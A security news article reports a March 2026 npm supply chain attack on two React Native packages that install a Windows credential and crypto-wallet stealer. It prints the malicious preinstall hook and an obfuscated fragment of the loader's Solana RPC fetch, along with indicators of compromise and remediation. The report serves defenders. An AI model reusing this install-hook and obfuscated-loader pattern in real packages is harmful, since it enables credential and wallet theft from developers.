Credential-Stealing npm Malware Found In Popular React Native Packages

On March 16, 2026, researchers discovered a coordinated supply chain attack targeting two popular React Native npm packages.

The compromised releases inject an install-time loader that silently downloads and executes a multi-stage Windows credential and cryptocurrency stealer. Developers trigger the infection simply by running a routine npm installation.

The Supply Chain Attack

The threat actor compromised packages published by AstrOOnauta and released malicious versions within minutes of each other.

The attack replaced clean versions with infected updates that share a byte-identical malicious payload.

Package Name	Clean Version	Malicious Version	Monthly Downloads
react-native-international-phone-number	0.11.7	0.11.8	~92,000 ​
react-native-country-select	0.3.9	0.3.91	~42,000

According to Aikido, the malicious code relies on a new preinstall script added to the package’s configuration file. This script runs automatically before the main installation finishes.

Both malicious releases add the same package lifecycle hook:

"scripts": {
    "preinstall": "node install.js"
}

The heavily obfuscated code first contacts a Solana remote procedure call endpoint to retrieve a transaction memo containing a hidden web link for the second stage.

The original shipped installer shows the Solana RPC fetch directly:

let y = await fetch(S, {
    'method': e(0x45b, 'nSeb', 0x48f, 0x42b),
    'headers': M,
    'body': JSON[d(0x473, 'kjpv', 0x42d, 0x471)]({
        'jsonrpc': e(0x42c, ')qo^', 0x477, 0x425),
        'id': 0x1,
        'method': 'getSignatu' + e(0x441, 'PhAy', 0x42c, 0x45e) + d(0x4bb, '6bCJ', 0x4b3, 0x4d3),
        'params': [H[d(0x50d, '%Rah', 0x527, 0x4f7)](), t]
    })
});

Once downloaded, the second stage provides the necessary decryption keys to unlock the final Windows-focused stealer.

This final stage establishes persistence on the victim’s machine by modifying scheduled tasks and registry keys. To hide its tracks, the malware uses a Google Calendar URL as an extra layer of indirection to fetch its final instructions.​

Impact and Evasion Tactics

The malware actively checks the victim’s system environment, including language settings and time zones, to ensure the victim does not reside in Russia.

If it detects signals like “ru_RU” or a Russian timezone, the malware silently exits. This geographic filtering is a common evasion tactic used by Russian-speaking threat actors.

If the system passes the location check, the payload searches the victim’s application data for Chromium and Firefox browser profiles.

It explicitly targets extensions for MetaMask, Phantom, Trust Wallet, and several other cryptocurrency wallets. It also executes system commands to steal authenticated npm registry tokens and GitHub credentials.

Indicator Type	Details
Malicious Hash (SHA-256)	59221aa9623d86c930357dba7e3f54138c7ccbd0daa9c483d766cd8ce1b6ad26 ​
Malicious IPs	45.32.150.251, 217.69.3.152 ​
Associated Domains	socket.network, n.xyz, p.link

Developers using these packages should audit their environments immediately.

The recommended remediation is to pin dependencies to the last known clean versions and rotate any exposed credentials.

Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google.

The post Credential-Stealing npm Malware Found In Popular React Native Packages appeared first on Cyber Security News.